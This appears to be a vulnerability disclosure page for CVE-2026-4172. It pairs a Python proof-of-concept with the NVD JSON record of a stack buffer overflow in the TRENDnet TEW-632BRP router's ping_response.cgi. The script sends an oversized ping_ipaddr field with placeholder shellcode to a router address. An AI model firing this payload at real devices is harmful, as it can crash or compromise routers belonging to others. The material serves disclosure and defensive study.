CVE-2026-4172

#!/usr/bin/env python3 """ CVE-2026-4172 PoC - TRENDnet TEW-632BRP Buffer Overflow Target: /ping_response.cgi Vulnerable Parameter: ping_ipaddr """ import requests import sys target_ip = sys.argv[1] if len(sys.argv) > 1 else "192.168.10.1" target_port = sys.argv[2] if len(sys.argv) > 2 else "80" url = f"http://{target_ip}:{target_port}/ping_response.cgi" # Generate overflow payload # Buffer size depends on firmware, adjust accordingly buffer_size = 1000 padding = b"A" * buffer_size # MIPS NOP sled + shellcode placeholder # In real exploit, this would contain actual shellcode shellcode = b"\x00\x00\x00\x00" * 10 payload = padding + shellcode data = { "ping_ipaddr": payload.decode('latin-1'), "submit_button": "ping", "ping_ipaddr_submitted": "1" } print(f"[*] Sending exploit to {url}") print(f"[*] Payload size: {len(payload)} bytes") try: response = requests.post(url, data=data, timeout=10) print(f"[+] Request sent, Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}")

{"cve": {"id": "CVE-2026-4172", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:57.397", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in TRENDnet TEW-632BRP 1.010B32. This affects an unknown part of the file /ping_response.cgi of the component HTTP POST Request Handler. The manipulation of the argument ping_ipaddr results in stack-based buffer overflow. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se detectó una vulnerabilidad en TRENDnet TEW-632BRP 1.010B32. Esto afecta una parte desconocida del archivo /ping_response.cgi del componente Gestor de Solicitudes HTTP POST. La manipulación del argumento ping_ipaddr resulta en un desbordamiento de búfer basado en pila. El ataque puede realizarse de forma remota. El exploit es ahora público y puede ser utilizado. Se contactó con el proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:C/I:C/A:C", "baseScore": 8.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 6.4, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://github.com/i-Corner/cve/issues/40", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351079", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351079", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.769770", "source": "[email protected]"}]}}